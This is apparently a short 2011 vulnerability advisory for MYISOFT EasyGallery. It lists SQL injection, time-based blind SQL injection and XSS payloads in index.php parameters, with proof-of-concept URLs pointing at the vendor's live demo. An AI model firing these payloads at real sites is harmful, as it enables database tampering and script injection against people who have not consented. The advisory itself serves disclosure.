# Exploit Title: MYISOFT EasyGallery SQL Injection - Blind SQL  
Injection - Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

SQL Injection, Blind SQL Injection and XSS can be done using the command input

Vulnerable Page:
index.php


Example:
index.php?do=<SQL Injection Code>&page=register&PageSection=0
index.php?catid=<SQL Injection Code>&page=category&PageSection=0
index.php/<XSS Code>
index.php?Go=Go&page=search&search=<Blind SQL Injection>


Exploit:
index.php?catid=1'&page=category&PageSection=0
index.php/%27onmouseover=prompt(932505)%3E
index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1 --


POC:
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?catid=1'&page=category&PageSection=0
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php/%27onmouseover=prompt(932505)%3E
http://myiosoft.com/products/EasyGallery/demo/staticpages/easygallery/index.php?Go=Go&page=search&search=1' or (sleep(2)%2b1) limit 1  
--



Thanks,

Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr